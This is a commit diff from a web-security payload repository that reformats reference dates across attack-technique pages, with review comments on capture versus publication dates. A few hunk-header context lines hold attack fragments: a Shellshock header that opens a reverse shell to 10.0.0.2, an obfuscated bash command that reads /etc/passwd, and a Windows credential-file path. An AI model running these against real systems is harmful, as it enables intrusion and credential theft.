Update reference date, fix format

This commit is contained in:
Swissky
2026-04-22 16:04:22 +02:00
parent d4e6eda4ad
commit e961fef231
37 changed files with 85 additions and 85 deletions


@@ -89,7 +89,7 @@ In this example, instead of rounding and rejecting or enforcing a minimum transf
## References
* [Business Logic Vulnerabilities - PortSwigger - 2024](https://web.archive.org/web/20260305155804/https://portswigger.net/web-security/logic-flaws)
* [Business Logic Vulnerability - OWASP - 2024](https://web.archive.org/web/20200422002600/https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
* [Business Logic Vulnerabilities - PortSwigger - March 5, 2026](https://web.archive.org/web/20260305155804/https://portswigger.net/web-security/logic-flaws)
* [Business Logic Vulnerability - OWASP - April 22, 2020](https://web.archive.org/web/20200422002600/https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
* [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://web.archive.org/web/20260304013031/https://cwe.mitre.org/data/definitions/840.html)
* [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://web.archive.org/web/20200922175829/https://portswigger.net/web-security/logic-flaws/examples)
* [Examples of Business Logic Vulnerabilities - PortSwigger - September 22, 2020](https://web.archive.org/web/20200922175829/https://portswigger.net/web-security/logic-flaws/examples)
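Review bot: the new dates in this hunk are Wayback capture dates rather than publication dates: `Business Logic Vulnerabilities - PortSwigger - March 5, 2026` takes its date from the `web/20260305155804` snapshot and the OWASP entry from `web/20200422002600`, while `CWE-840: Business Logic Errors - CWE - March 24, 2011` keeps what looks like a publication date. Pick one convention for the whole list and state it, or mark capture dates as such (for example "archived March 5, 2026"), otherwise the date column tells the reader two different things.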


@@ -269,6 +269,6 @@ function reqListener() {
* [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://web.archive.org/web/20230323053559/https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
* [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://web.archive.org/web/20260302141111/https://portswigger.net/web-security/cors)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://web.archive.org/web/20250512191501/https://hackerone.com/reports/235200)
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - October 14, 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://web.archive.org/web/20260204152901/https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14, 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)


@@ -192,7 +192,7 @@ Payload example using `fontleak` with a custom selector, parent element, and alp
* [CSS based Attack: Abusing unicode-range of @font-face - Masato Kinugawa - October 23, 2015](https://web.archive.org/web/20260212042745/https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html)
* [CSS Data Exfiltration to Steal OAuth Token - - September 13, 2025](https://web.archive.org/web/20250601232405/https://blog.voorivex.team/css-data-exfiltration-to-steal-oauth-token)
* [CSS Injection - xsleaks.dev - May 9, 2025](https://web.archive.org/web/20260114161847/https://xsleaks.dev/docs/attacks/css-injection/)
* [CSS Injection Attacks or how to leak content with <style> - Pepe Vila - 2019](https://web.archive.org/web/20250928084357/https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)
* [CSS Injection Attacks or how to leak content with <style> - Pepe Vila - September 28, 2025](https://web.archive.org/web/20250928084357/https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)
* [CSS Injection: Attacking with Just CSS (Part 2) - aszx87410 - September 24, 2023](https://web.archive.org/web/20231223213409/https://aszx87410.github.io/beyond-xss/en/ch3/css-injection-2/)
* [Fontleak: exfiltrating text using CSS and Ligatures - Dragos Albastroiu - April 16, 2025](https://web.archive.org/web/20251130021102/https://adragos.ro/fontleak/)
* [How you can steal private data through CSS injection - invicti - April 23, 2018](https://web.archive.org/web/20251107094938/https://www.invicti.com/blog/web-security/private-data-stolen-exploiting-css-injection)
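Review bot: the Pepe Vila slides lose their publication year in this hunk: `2019` becomes `September 28, 2025`, which is the `web/20250928084357` capture date, although the file name in the URL (`2019-s3_css_injection_attacks.pdf`) dates the talk to 2019; keep 2019. In the unchanged context, `CSS Data Exfiltration to Steal OAuth Token - - September 13, 2025` has an empty author field (two consecutive separators); fill in the author or drop the extra dash.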


@@ -78,8 +78,8 @@ curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/44
## References
* [Heartbleed - Official website](https://web.archive.org/web/20260302163556/https://heartbleed.com/)
* [Shellshock - Wikipedia](https://web.archive.org/web/20140929214920/http://en.wikipedia.org:80/wiki/Shellshock_(software_bug))
* [Imperva Apache Struts analysis](https://web.archive.org/web/20180305002332/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
* [EternalBlue - Wikipedia](https://web.archive.org/web/20260304111336/https://en.wikipedia.org/wiki/EternalBlue)
* [BlueKeep - Microsoft](https://web.archive.org/web/20201104070840/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
* [The Heartbleed Bug - Heartbleed - April 7, 2014](https://web.archive.org/web/20260302163556/https://heartbleed.com/)
* [Shellshock (software bug) - Wikipedia - September 29, 2014](https://web.archive.org/web/20140929214920/http://en.wikipedia.org:80/wiki/Shellshock_(software_bug))
* [Apache Struts Equifax Hack Analysis Part 1: CVE-2017-5638 - Imperva - March 9, 2017](https://web.archive.org/web/20180305002332/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
* [EternalBlue - Wikipedia - March 4, 2026](https://web.archive.org/web/20260304111336/https://en.wikipedia.org/wiki/EternalBlue)
* [CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability - Microsoft - November 4, 2020](https://web.archive.org/web/20201104070840/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
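Review bot: the two Wikipedia entries take their new dates from the archive capture (`September 29, 2014` from `web/20140929214920`, `March 4, 2026` from `web/20260304111336`), whereas the Heartbleed and Imperva entries are dated by disclosure or publication (`April 7, 2014`, `March 9, 2017`). Mixing the two in one list makes the date unreliable; for the Wikipedia entries either use the capture date consistently and label it, or leave the date out.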


@@ -61,12 +61,12 @@ Real-World Scenarios:
## References
* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://web.archive.org/web/20260222183040/https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - 02 Jul 2024](https://web.archive.org/web/20240702212818/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24 2024](https://web.archive.org/web/20250521192653/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - 30-08-2023](https://web.archive.org/web/20240703155707/https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
* [On-site request forgery - Dafydd Stuttard - 03 May 2007](https://web.archive.org/web/20260212042947/https://portswigger.net/blog/on-site-request-forgery)
* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - 2024-05-10](https://web.archive.org/web/20240512110749/https://matanber.com/blog/cspt-levels)
* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - July 2, 2024](https://web.archive.org/web/20260222183040/https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - July 2, 2024](https://web.archive.org/web/20240702212818/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24, 2024](https://web.archive.org/web/20250521192653/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - August 30, 2023](https://web.archive.org/web/20240703155707/https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
* [On-site request forgery - Dafydd Stuttard - May 3, 2007](https://web.archive.org/web/20260212042947/https://portswigger.net/blog/on-site-request-forgery)
* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - May 10, 2024](https://web.archive.org/web/20240512110749/https://matanber.com/blog/cspt-levels)
* [Automating Client-Side Path Traversals Discovery - Vitor Falcao - October 3, 2024](https://web.archive.org/web/20241004042613/https://vitorfalcao.com/posts/automating-cspt-discovery/)
* [CSPT the Eval Villain Way! - Dennis Goodlett - December 3, 2024](https://web.archive.org/web/20241203171704/https://blog.doyensec.com/2024/12/03/cspt-with-eval-villain.html)
* [Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal - Maxence Schmitt - January 9, 2025](https://web.archive.org/web/20250109093347/https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
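Review bot: ordering: `Bypassing WAFs to Exploit CSPT Using Encoding Levels` sits after `On-site request forgery`, and the three unchanged entries at the end (`Automating Client-Side Path Traversals Discovery`, `CSPT the Eval Villain Way!`, `Bypassing File Upload Restrictions...`) are appended in no particular order, so the list is neither alphabetical nor chronological, unlike the CORS and CSS lists in this same commit. Since every line here is being rewritten anyway, sort it in the same pass.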


@@ -470,7 +470,7 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
* [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://web.archive.org/web/20241202133053/https://twitter.com/DissectMalware/status/1025604382644232192)
* [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://web.archive.org/web/20220428000241/https://twitter.com/asdizzle_/status/895244943526170628)
* [OS Command Injection - PortSwigger - 2024](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection)
* [OS Command Injection - PortSwigger - March 30, 2019](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection)
* [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://web.archive.org/web/20250108174818/https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - kacperszurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
* [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - Kacper Szurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
* [WorstFit: Unveiling Hidden Transformers in Windows ANSI! - Orange Tsai - January 10, 2025](https://web.archive.org/web/20250109163006/https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/)
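Review bot: `OS Command Injection - PortSwigger - March 30, 2019` replaces `2024` with the `web/20190330193912` capture date, which is acceptable only if capture dates are the convention; but the `kacperszurek` GitHub entry, which is not archived at all, keeps a publication date (`April 25, 2018`), so a reader cannot tell which kind of date an entry carries. The other PortSwigger entries in this commit link to 2026 captures; consider a current capture here too rather than a seven-year-old snapshot.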


@@ -146,17 +146,17 @@ xhr.send('{"role":admin}');
## References
* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://web.archive.org/web/20220926223539/https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
* [Cross-Site Request Forgery (CSRF) - OWASP - Apr 19, 2024](https://web.archive.org/web/20120920091432/https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3, 2016](https://web.archive.org/web/20220926223539/https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
* [Cross-Site Request Forgery (CSRF) - OWASP - April 19, 2024](https://web.archive.org/web/20120920091432/https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
* [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton - July 26, 2015](https://web.archive.org/web/20170919181010/https://whitton.io/articles/messenger-site-wide-csrf/)
* [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - 19 July 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
* [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - 2014/10/09](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/)
* [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - July 19, 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
* [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - October 9, 2014](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/)
* [Add tweet to collection CSRF - Vijay Kumar (indoappsec) - November 21, 2015](https://web.archive.org/web/20250519092910/https://hackerone.com/reports/100820)
* [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd - October 16, 2015](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
* [How I Hacked Your Beats Account? Apple Bug Bounty - @aaditya_purani - 2016/07/20](https://web.archive.org/web/20250504102847/https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
* [How I Hacked Your Beats Account? Apple Bug Bounty - Aaditya Purani (@aaditya_purani) - July 20, 2016](https://web.archive.org/web/20250504102847/https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
* [FORM POST JSON: JSON CSRF on POST Heartbeats API - Eugene Yakovchuk - July 2, 2017](https://web.archive.org/web/20180102010752/https://hackerone.com/reports/245346)
* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15th, 2018](https://web.archive.org/web/20260208211335/https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
* [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](https://web.archive.org/web/20250906213239/https://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
* [Cross-Site Request Forgery Attack - PwnFunction - 5 Apr. 2019](https://web.archive.org/web/20251127000352/https://www.youtube.com/watch?v=eWEgUcHPle0)
* [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://web.archive.org/web/20250727045637/https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
* [Bypass Referer Check Logic for CSRF - hahwul - Oct 11, 2019](https://web.archive.org/web/20250719144921/https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15, 2018](https://web.archive.org/web/20260208211335/https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
* [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - January 9, 2019](https://web.archive.org/web/20250906213239/https://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
* [Cross-Site Request Forgery Attack - PwnFunction - April 5, 2019](https://web.archive.org/web/20251127000352/https://www.youtube.com/watch?v=eWEgUcHPle0)
* [Wiping Out CSRF - Joe Rozner - October 17, 2017](https://web.archive.org/web/20250727045637/https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
* [Bypass Referer Check Logic for CSRF - hahwul - October 11, 2019](https://web.archive.org/web/20250719144921/https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
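Review bot: `Cross-Site Request Forgery (CSRF) - OWASP - April 19, 2024` is dated twelve years after the capture it links to (`web/20120920091432`); a 2012 snapshot cannot be the April 2024 version of the page. Either link a 2024 capture or date the entry to the snapshot. Separately, the `Facebookmarketingdevelopers.com` entry is the only one in this list without a web.archive.org link; worth archiving while the list is being normalised.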


@@ -93,4 +93,4 @@ localhost.example.com. 381 IN CNAME localhost.
## References
* [How Do DNS Rebinding Attacks Work? - nccgroup - Apr 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)
* [How Do DNS Rebinding Attacks Work? - NCC Group - April 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)


@@ -138,8 +138,8 @@ Exploitation requires any kind of `HTML injection` in the page.
## References
- [Bypassing CSP via DOM clobbering - Gareth Heyes - 05 June 2023](https://web.archive.org/web/20251114182213/https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
- [Bypassing CSP via DOM clobbering - Gareth Heyes - June 5, 2023](https://web.archive.org/web/20251114182213/https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
- [DOM Clobbering - HackTricks - January 27, 2023](https://web.archive.org/web/20241215205040/https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering)
- [DOM Clobbering - PortSwigger - September 25, 2020](https://web.archive.org/web/20260218083100/https://portswigger.net/web-security/dom-based/dom-clobbering)
- [DOM Clobbering strikes back - Gareth Heyes - 06 February 2020](https://web.archive.org/web/20200224065316/https://portswigger.net/research/dom-clobbering-strikes-back)
- [Hijacking service workers via DOM Clobbering - Gareth Heyes - 29 November 2022](https://web.archive.org/web/20260123013910/https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
- [DOM Clobbering strikes back - Gareth Heyes - February 6, 2020](https://web.archive.org/web/20200224065316/https://portswigger.net/research/dom-clobbering-strikes-back)
- [Hijacking service workers via DOM Clobbering - Gareth Heyes - November 29, 2022](https://web.archive.org/web/20260123013910/https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)


@@ -349,7 +349,7 @@ c:/windows/repair/system
* [Directory traversal - Portswigger - March 30, 2019](https://web.archive.org/web/20190330191447/https://portswigger.net/web-security/file-path-traversal)
* [Directory traversal attack - Wikipedia - August 5, 2024](https://web.archive.org/web/20111013162219/http://en.wikipedia.org:80/wiki/Directory_traversal_attack)
* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://web.archive.org/web/20240323234120/https://youtu.be/YlZGJ28By8U)
* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - 19 June 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - June 19, 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
* [NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
* [Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015](https://web.archive.org/web/20170123115404/https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
* [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - June 24, 2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))
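Review bot: the unchanged context line `Directory traversal attack - Wikipedia - August 5, 2024` links to a 2011 capture (`web/20111013162219`), so the date and the link disagree in exactly the way this commit is fixing elsewhere; update it in the same pass. The `Portswigger` spelling on the first line also differs from the `PortSwigger` used in the other lists.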


@@ -295,9 +295,9 @@ If SSH is active, check which user is being used in the machine by including the
## References
- [LFI WITH PHPINFO() ASSISTANCE - Brett Moore - September 2011](https://web.archive.org/web/20170406225317/https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf)
- [LFI WITH PHPINFO() ASSISTANCE - Brett Moore - April 6, 2017](https://web.archive.org/web/20170406225317/https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf)
- [LFI2RCE via PHP Filters - HackTricks - July 19, 2024](https://web.archive.org/web/20220819000915/https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
- [Local file inclusion tricks - Johan Adriaans - August 4, 2007](https://web.archive.org/web/20250403080651/http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
- [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - Gynvael Coldwind - March 18, 2011](https://web.archive.org/web/20110429042455/http://gynvael.coldwind.pl:80/?id=376)
- [PHP LFI with Nginx Assistance - Bruno Bierbaumer - 26 Dec 2021](https://web.archive.org/web/20250604035904/https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
- [PHP LFI with Nginx Assistance - Bruno Bierbaumer - December 26, 2021](https://web.archive.org/web/20250604035904/https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
- [Upgrade from LFI to RCE via PHP Sessions - Reiners - September 14, 2017](https://web.archive.org/web/20170914211708/https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
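Review bot: this hunk replaces a publication date with a capture date: `LFI WITH PHPINFO() ASSISTANCE - Brett Moore - September 2011` becomes `April 6, 2017`, which is the `web/20170406225317` snapshot, while the paper itself is from 2011. Restore `September 2011`; the other entries in this list keep publication dates (for example `Johan Adriaans - August 4, 2007` with a 2025 capture).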


@@ -137,9 +137,9 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
## References
- [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
- [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
- [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
- [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/)
- [Testing for Local File Inclusion - OWASP - 25 June 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
- [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)
- [CVV #1: Local File Inclusion - SI9INT - June 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
- [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - May 12, 2019](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
- [Is PHP vulnerable and under what conditions? - Andreas Venieris - April 13, 2015](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
- [LFI Cheat Sheet - @Arr0way - April 24, 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/)
- [Testing for Local File Inclusion - OWASP - June 25, 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
- [Turning LFI into RFI - Grayson Christopher - August 14, 2017](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)
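Review bot: `Testing for Local File Inclusion - OWASP - June 25, 2017` links to a 2013 capture (`web/20131021005706`); a 2017 date on a 2013 snapshot is the same mismatch this commit is cleaning up elsewhere, so fix it here as well. The reorder of the Venieris entry from `title - date - author` to `title - author - date` is the right normalisation.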


@@ -263,7 +263,7 @@ code remote.py # edit Remote.oracle
## References
- [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - Dec 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
- [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - December 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
- [Iconv, set the charset to RCE: exploiting the libc to hack the php engine (part 1) - Charles Fol - May 27, 2024](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)
- [Introducing lightyear: a new way to dump PHP files - Charles Fol - November 4, 2024](https://web.archive.org/web/20250809094219/https://www.ambionics.io/blog/lightyear-file-dump)
- [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - December 11, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
@@ -272,4 +272,4 @@ code remote.py # edit Remote.oracle
- [OffensiveCon24 - Charles Fol- Iconv, Set the Charset to RCE - June 14, 2024](https://youtu.be/dqKFHjcK9hM)
- [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - March 21, 2023](https://web.archive.org/web/20260228090126/https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
- [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - October 18, 2022](https://web.archive.org/web/20260212042712/https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
- [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
- [Solving "includer's revenge" from hxp CTF 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
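Review bot: style: the context line `OffensiveCon24 - Charles Fol- Iconv, Set the Charset to RCE` is missing the space before the separator after `Charles Fol`; fix it while this file is being touched. The YouTube, Gist and ambionics.io links in this list are not archived, unlike the Synacktiv entries, which all carry a web.archive.org capture.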


@@ -479,17 +479,17 @@ query {
- [Exploiting GraphQL - AssetNote - Shubham Shah - August 29, 2021](https://web.archive.org/web/20210830161635/https://blog.assetnote.io/2021/08/29/exploiting-graphql/)
- [GraphQL Batching Attack - Wallarm - December 13, 2019](https://web.archive.org/web/20260223043402/https://lab.wallarm.com/graphql-batching-attack/)
- [GraphQL for Pentesters presentation - Alexandre ZANNI (@noraj) - December 1, 2022](https://web.archive.org/web/20230205233412/https://acceis.github.io/prez-graphql/)
- [API Hacking GraphQL - @ghostlulz - Jun 8, 2019](https://web.archive.org/web/20190619040847/https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
- [Discovering GraphQL endpoints and SQLi vulnerabilities - Matías Choren - Sep 23, 2018](https://web.archive.org/web/20180923085151/https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
- [API Hacking GraphQL - @ghostlulz - June 8, 2019](https://web.archive.org/web/20190619040847/https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
- [Discovering GraphQL endpoints and SQLi vulnerabilities - Matías Choren - September 23, 2018](https://web.archive.org/web/20180923085151/https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
- [GraphQL abuse: Bypass account level permissions through parameter smuggling - Jon Bottarini - March 14, 2018](https://web.archive.org/web/20231027032512/https://labs.detectify.com/2018/03/14/graphql-abuse/)
- [Graphql Bug to Steal Anyone's Address - Pratik Yadav - Sept 1, 2019](https://web.archive.org/web/20250514221822/https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
- [Graphql Bug to Steal Anyone's Address - Pratik Yadav - September 1, 2019](https://web.archive.org/web/20250514221822/https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
- [GraphQL cheatsheet - devhints.io - November 7, 2018](https://web.archive.org/web/20181107093033/https://devhints.io/graphql)
- [GraphQL Introspection - GraphQL - August 21, 2024](https://web.archive.org/web/20260302160506/https://graphql.org/learn/introspection/)
- [GraphQL NoSQL Injection Through JSON Types - Pete Corey - June 12, 2017](https://web.archive.org/web/20250514221852/https://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
